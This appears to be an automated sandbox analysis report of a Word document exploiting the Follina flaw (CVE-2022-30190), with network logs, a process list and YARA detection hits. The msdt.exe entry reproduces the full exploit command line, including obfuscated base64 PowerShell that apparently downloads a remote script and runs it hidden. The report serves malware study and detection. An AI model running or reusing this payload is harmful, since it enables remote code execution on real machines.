                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:57 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                5192.168.2.349747116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:57 UTC9OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:29:57 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:57 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                6192.168.2.349748116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:57 UTC10OUTOPTIONS / HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                User-Agent: Microsoft Office Word 2014
                                                                                                                                                                X-Office-Major-Version: 16
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-FeatureVersion: 1
                                                                                                                                                                X-MSGETWEBURL: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                2022-06-20 06:29:57 UTC10INHTTP/1.1 200 OK
                                                                                                                                                                Allow: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                Public: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:57 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                7192.168.2.349749116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:58 UTC10OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                User-Agent: Microsoft Office Word 2014
                                                                                                                                                                X-Office-Major-Version: 16
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-FeatureVersion: 1
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                2022-06-20 06:29:58 UTC10INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:57 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                8192.168.2.349750116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:58 UTC11OUTGET /microsoft.html HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                If-Modified-Since: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                If-None-Match: "b0474a7ada82d81:0"
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:29:58 UTC11INHTTP/1.1 304 Not Modified
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:57 GMT
                                                                                                                                                                Etag: "b0474a7ada82d81:0"
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                9192.168.2.349751116.203.251.9443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                2022-06-20 06:29:58 UTC11OUTHEAD /microsoft.html HTTP/1.1
                                                                                                                                                                Authorization: Bearer
                                                                                                                                                                X-MS-CookieUri-Requested: t
                                                                                                                                                                X-IDCRL_ACCEPTED: t
                                                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                Host: upgrade.4nmn.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2022-06-20 06:29:58 UTC11INHTTP/1.1 200 OK
                                                                                                                                                                Content-Length: 7402
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                ETag: "b0474a7ada82d81:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                Date: Mon, 20 Jun 2022 06:29:57 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Statistics

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:08:29:46
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                Imagebase:0x380000
                                                                                                                                                                File size:1937688 bytes
                                                                                                                                                                MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:08:29:51
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                Imagebase:0x1190000
                                                                                                                                                                File size:466688 bytes
                                                                                                                                                                MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:08:30:00
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdQBtAG0AaQB0AC4AZABpAGQAbgBzAC4AcgB1AC8AZgBvAHIAYgBlAHMAdAAuAHAAcwAxACcALAAgACcAQwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwApACAAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgByAGUAcwB0AHIAaQBjAHQAZQBkACAALQBGAGkAbABlACAAQwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                Imagebase:0x1160000
                                                                                                                                                                File size:1508352 bytes
                                                                                                                                                                MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:08:30:28
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline
                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                File size:2170976 bytes
                                                                                                                                                                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:08:30:30
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                File size:43176 bytes
                                                                                                                                                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:08:30:33
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline
                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                File size:2170976 bytes
                                                                                                                                                                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:08:30:35
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                File size:43176 bytes
                                                                                                                                                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:08:30:50
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1
                                                                                                                                                                Imagebase:0xb00000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Recon_Commands_Windows_Gen1, Description: Detects a set of reconnaissance commands on Windows systems, Source: 00000019.00000003.452130269.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:08:30:50
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:08:30:51
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline
                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                File size:2170976 bytes
                                                                                                                                                                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:28
                                                                                                                                                                Start time:08:30:53
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                File size:43176 bytes
                                                                                                                                                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Target ID:42
                                                                                                                                                                Start time:08:32:01
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\system32\ipconfig.exe" /all
                                                                                                                                                                Imagebase:0xb10000
                                                                                                                                                                File size:29184 bytes
                                                                                                                                                                MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Disassembly

                                                                                                                                                                No disassembly